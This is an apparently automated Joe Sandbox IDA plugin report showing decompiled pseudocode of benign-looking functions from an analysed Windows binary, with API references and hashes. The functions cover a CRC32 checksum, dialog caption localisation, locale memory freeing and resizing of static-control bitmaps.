					 *(_t91 + 0x18) = E0100A7FB(_t88) >> 8;
					E0100A7E4(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E0100A7FB(_t88) >> 8;
					E0100A7E4(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E0100A7FB(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}

0x010137c7
0x010137cb
0x010137ce
0x010137d2
0x010137d4
0x010137d8
0x010137de
0x01013808
0x0101381b
0x0101381f
0x01013828
0x01013833
0x01013834
0x0101383b
0x00000000
0x00000000
0x01013844
0x01013847
0x01013858
0x0101385c
0x01013865
0x010138a0
0x010138a0
0x010138b0
0x010138bd
0x00000000
0x00000000
0x010138c3
0x010138c5
0x010138c8
0x010138cb
0x010138d1
0x010138d5
0x010138d7
0x010138d7
0x010138d9
0x010138e9
0x010138ee
0x00000000
0x010138ee
0x01013867
0x0101386b
0x0101386d
0x01013879
0x0101387b
0x01013881
0x01013883
0x0101388e
0x01013890
0x01013893
0x01013893
0x01013898
0x0101389c
0x00000000
0x010137f6
0x010137f6
0x00000000
0x010137f6

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 6088e73c2494fbc98542f5e0de1ce0a0182236909d4c608457c2d0bc7ae40b2d
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 5F31C3B17147468FDB14DF28C8512AABBE0FB95310F14892DE8EACB741C739E949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01005F3C, Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E01005F3C(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0x103eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0x103eeb0 + (_t68 >> 0x18) * 4) ^  *(0x103f2b0 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x103f6b0 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x103feb0 + (_t51 >> 0x18) * 4) ^  *(0x10402b0 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x10406b0 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x103fab0 + (_t68 & 0x000000ff) * 4) ^  *(0x1040ab0 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0x103eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}

0x01005f3f
0x01005f43
0x01005f47
0x01005f4c
0x01005f4e
0x01005f5e
0x01005f65
0x01005f66
0x01005f69
0x01005f6c
0x00000000
0x00000000
0x00000000
0x01005f6c
0x01005f4e
0x01005f6e
0x01005f71
0x01005f7a
0x01005f7d
0x01005f7d
0x01005f7f
0x01005f82
0x01005fdf
0x01005fe2
0x01005ff6
0x01005ff8
0x01005ff8
0x01005ffd
0x01006000
0x01006002
0x0100600d
0x01006014
0x01006015
0x01006015
0x01006002
0x0100601f

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c972121c58159e649a6bf1632041223ea22fbf03517c9ed619f23961712ae9
Instruction ID: 8b4f8011bfac2ecd192810c2f5a30cc621ab68087d10e663a9b167c0275202c0
Opcode Fuzzy Hash: d4c972121c58159e649a6bf1632041223ea22fbf03517c9ed619f23961712ae9
Instruction Fuzzy Hash: 57210A72A241214BC759CE2DD8D047677A5A78A311B46826FFBC2CB2C5C53EE925CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100DA98, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0100DA98(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E0100400A( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E01011596( &_v2208,  &_v2288, 0x50);
				_t96 = E01023630( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0x103e5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E0100D0EE(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E0100D171(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x1062150(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0x1062150(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0x103e154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0x10346b8
							_t151 = E01025EC0( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0x10346b8
								if(E0100D2C8(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0x103e5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}

0x0100dab0
0x0100daba
0x0100dabe
0x0100dac3
0x0100dad5
0x0100dadf
0x0100dae4
0x0100daeb
0x0100daee
0x0100daf2
0x0100daf8
0x0100db55
0x0100db6d
0x0100db75
0x0100db79
0x0100db85
0x0100db97
0x0100db9e
0x0100dba2
0x0100dba5
0x0100dbad
0x0100dbb3
0x0100dbb9
0x0100dc5c
0x0100dc5c
0x0100dc64
0x0100dc95
0x0100dc95
0x0100dc9b
0x0100dca6
0x0100dca8
0x0100dcae
0x0100dcb0
0x0100dcb6
0x0100dd68
0x0100dd68
0x0100dd68
0x0100dcbc
0x0100dd56
0x0100dcc3
0x0100dcc9
0x00000000
0x00000000
0x0100dcd5
0x0100dcdf
0x0100dcf4
0x0100dcf9
0x0100dcfc
0x0100dd12
0x0100dd1a
0x0100dd1c
0x0100dd1d
0x0100dd25
0x0100dd37
0x0100dd3e
0x0100dd47
0x0100dd4d
0x0100dd4f
0x0100dd53
0x00000000
0x00000000
0x0100dd55
0x0100dd55
0x0100dd55
0x00000000
0x0100dd56
0x0100dbc7
0x00000000
0x00000000
0x0100dbd4
0x0100dbd7
0x0100dbe0
0x0100dbe5
0x0100dbeb
0x0100dbef
0x0100dbf0
0x0100dbf6
0x0100dc00
0x0100dc07
0x0100dc10
0x0100dc14
0x0100dc18
0x0100dc1a
0x0100dc1a
0x0100dc1e
0x0100dc20
0x0100dc20
0x0100dc46
0x0100dc52
0x0100dc58
0x00000000
0x0100dafa
0x0100dafa
0x0100daff
0x0100db02
0x0100db05
0x0100db0d
0x0100db12
0x0100db17
0x0100db28
0x0100db32
0x0100db3f
0x0100db3f
0x0100db32
0x0100db45
0x0100db45
0x0100db49
0x0100db4a
0x0100db4d
0x0100db4d
0x00000000
0x0100daff

APIs

_swprintf.LIBCMT ref: 0100DABE

Part of subcall function 0100400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0100401D

Part of subcall function 01011596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01040EE8,00000200,0100D202,00000000,?,00000050,01040EE8), ref: 010115B3

_strlen.LIBCMT ref: 0100DADF
SetDlgItemTextW.USER32(?,0103E154,?), ref: 0100DB3F
GetWindowRect.USER32(?,?), ref: 0100DB79
GetClientRect.USER32(?,?), ref: 0100DB85
GetWindowLongW.USER32(?,000000F0), ref: 0100DC25
GetWindowRect.USER32(?,?), ref: 0100DC52
SetWindowTextW.USER32(?,?), ref: 0100DC95
GetSystemMetrics.USER32(00000008), ref: 0100DC9D
GetWindow.USER32(?,00000005), ref: 0100DCA8
GetWindowRect.USER32(00000000,?), ref: 0100DCD5
GetWindow.USER32(00000000,00000002), ref: 0100DD47

Strings

d, xrefs: 0100DBA5
CAPTION, xrefs: 0100DC77
$%s:, xrefs: 0100DAB2

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: b821b1f24285e1d29c8e342458a48716ba4480ee5d61b123ce977095bc3b630f
Instruction ID: 863898e9a24e9e9eba445b08cee5509b8a31bea8b5aa1791f3ccb37689ba6baf
Opcode Fuzzy Hash: b821b1f24285e1d29c8e342458a48716ba4480ee5d61b123ce977095bc3b630f
Instruction Fuzzy Hash: 7C81B371108305AFE721DFA8CD88E6FBBE9EBC9704F04091DFAC497295D675E8058B62

Uniqueness

Uniqueness Score: -1.00%

Function 0102C233, Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0102C233(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x720043
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x103ed50) {
					_t3 = _t74 + 0x7c; // 0x654d7463
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x0
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E010284DE(_t46);
							_t5 = _t74 + 0x88; // 0x720043
							E0102BE12( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x79726f6d
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E010284DE(_t47);
							_t7 = _t74 + 0x88; // 0x720043
							E0102BF10( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x654d7463
						E010284DE( *_t8);
						_t9 = _t74 + 0x88; // 0x720043
						E010284DE( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0x700079
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0x500074
					E010284DE( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0x6f0072
					E010284DE( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x650074
					E010284DE( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0x700079
					E010284DE( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0x740063
				E0102C3A6( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x10339f8
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x1033980
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x103e818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E010284DE(_t31);
							E010284DE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x0
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E010284DE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E010284DE(_t74);
			}

0x0102c23b
0x0102c23f
0x0102c23f
0x0102c247
0x0102c250
0x0102c250
0x0102c255
0x0102c25c
0x0102c25c
0x0102c264
0x0102c26c
0x0102c271
0x0102c277
0x0102c27d
0x0102c27e
0x0102c27e
0x0102c286
0x0102c28e
0x0102c293
0x0102c299
0x0102c29f
0x0102c2a0
0x0102c2a3
0x0102c2a8
0x0102c2ae
0x0102c2b4
0x0102c255
0x0102c2b5
0x0102c2b5
0x0102c2bd
0x0102c2c4
0x0102c2d0
0x0102c2d5
0x0102c2e3
0x0102c2e8
0x0102c2f1
0x0102c2f6
0x0102c2fc
0x0102c301
0x0102c304
0x0102c30a
0x0102c312
0x0102c313
0x0102c313
0x0102c319
0x0102c31c
0x0102c31c
0x0102c31f
0x0102c326
0x0102c328
0x0102c32c
0x0102c334
0x0102c33b
0x0102c341
0x0102c342
0x0102c342
0x0102c349
0x0102c34b
0x0102c34b
0x0102c350
0x0102c358
0x0102c35d
0x0102c35e
0x0102c35e
0x0102c361
0x0102c364
0x0102c367
0x0102c36a
0x0102c36a
0x0102c37c

APIs

___free_lconv_mon.LIBCMT ref: 0102C277

Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE2F
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE41
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE53
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE65
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE77
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE89
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BE9B
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BEAD
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BEBF
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BED1
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BEE3
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BEF5
Part of subcall function 0102BE12: _free.LIBCMT ref: 0102BF07

_free.LIBCMT ref: 0102C26C

Part of subcall function 010284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958), ref: 010284F4
Part of subcall function 010284DE: GetLastError.KERNEL32(01033958,?,0102BFA7,01033958,00000000,01033958,00000000,?,0102BFCE,01033958,00000007,01033958,?,0102C3CB,01033958,01033958), ref: 01028506

_free.LIBCMT ref: 0102C28E
_free.LIBCMT ref: 0102C2A3
_free.LIBCMT ref: 0102C2AE
_free.LIBCMT ref: 0102C2D0
_free.LIBCMT ref: 0102C2E3
_free.LIBCMT ref: 0102C2F1
_free.LIBCMT ref: 0102C2FC
_free.LIBCMT ref: 0102C334
_free.LIBCMT ref: 0102C33B
_free.LIBCMT ref: 0102C358
_free.LIBCMT ref: 0102C370

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 0e2011178ef1231a343c702c82c904b9bc36b4883460e0cae59ca9bffd9edd62
Instruction ID: c00a4afad56db99d704f95d864ca8c0d56bdb13255d77787ae42e3b9fbf2187d
Opcode Fuzzy Hash: 0e2011178ef1231a343c702c82c904b9bc36b4883460e0cae59ca9bffd9edd62
Instruction Fuzzy Hash: BF317E326002259FFB61AA7CDA44B9A77E9FF01310F14C8AEE5C9D7550DF31A944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0101CD2E, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0101CD2E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E0101E360();
				_t8 = E01019D1A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E010117AC( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E01019D5A(_v4);
							SendMessageW(_t32, 0x172, 0, E01019F5D(_t27, _t48, _t25, E01019D39(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x0101cd2e
0x0101cd2e
0x0101cd33
0x0101cd38
0x0101cd3f
0x0101ce16
0x0101ce1c
0x0101ce1c
0x0101cd51
0x0101cd57
0x0101cd59
0x0101cd5b
0x0101cd5f
0x0101ce13
0x00000000
0x0101ce15
0x0101cd66
0x0101cd7d
0x0101cd94
0x0101cdb6
0x0101cdba
0x0101cdc4
0x0101cdce
0x0101cded
0x0101cdf4
0x0101cdf4
0x0101cdba
0x0101cdfd
0x0101ce03
0x0101ce07
0x0101ce09
0x0101ce0c
0x00000000
0x00000000
0x0101ce0c
0x00000000
0x0101ce07
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 0101CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0101CD7D

Part of subcall function 010117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0100BB05,00000000,.exe,?,?,00000800,?,?,010185DF,?), ref: 010117C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0101CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0101CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101CDED
DeleteObject.GDI32(00000000), ref: 0101CDF4
GetWindow.USER32(00000000,00000002), ref: 0101CDFD

Strings

STATIC, xrefs: 0101CD83

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: af87ea4d43a624f85234b3e9d7759716a2c383a642ca27b9e220c7f18754411c
Instruction ID: b4c37f635ecf9dc88f319a1cfa773550bb58963b2c5b36cbe8c63c057dd7a6a5
Opcode Fuzzy Hash: af87ea4d43a624f85234b3e9d7759716a2c383a642ca27b9e220c7f18754411c
Instruction Fuzzy Hash: B9112132184321BBF231BA249C09FAF3ADDBF54740F004424FBC2A50EACA7DC90687A1

Uniqueness

Uniqueness Score: -1.00%

Function 01028EB1, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01028EB1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x1035ed0) {
					E010284DE(_t52);
					_t26 = _a4;
				}
				E010284DE( *((intOrPtr*)(_t26 + 0x3c)));
				E010284DE( *((intOrPtr*)(_a4 + 0x30)));
				E010284DE( *((intOrPtr*)(_a4 + 0x34)));
				E010284DE( *((intOrPtr*)(_a4 + 0x38)));
				E010284DE( *((intOrPtr*)(_a4 + 0x28)));
				E010284DE( *((intOrPtr*)(_a4 + 0x2c)));
				E010284DE( *((intOrPtr*)(_a4 + 0x40)));
				E010284DE( *((intOrPtr*)(_a4 + 0x44)));
				E010284DE( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E01028D76(5,  &_v8);
				_v8 =  &_a4;
				return E01028DC6(4,  &_v8);
			}

0x01028eb7
0x01028eba
0x01028ec2
0x01028ec5
0x01028eca
0x01028ecd
0x01028ed1
0x01028edc
0x01028ee7
0x01028ef2
0x01028efd
0x01028f08
0x01028f13
0x01028f1e
0x01028f2c
0x01028f34
0x01028f3d
0x01028f45
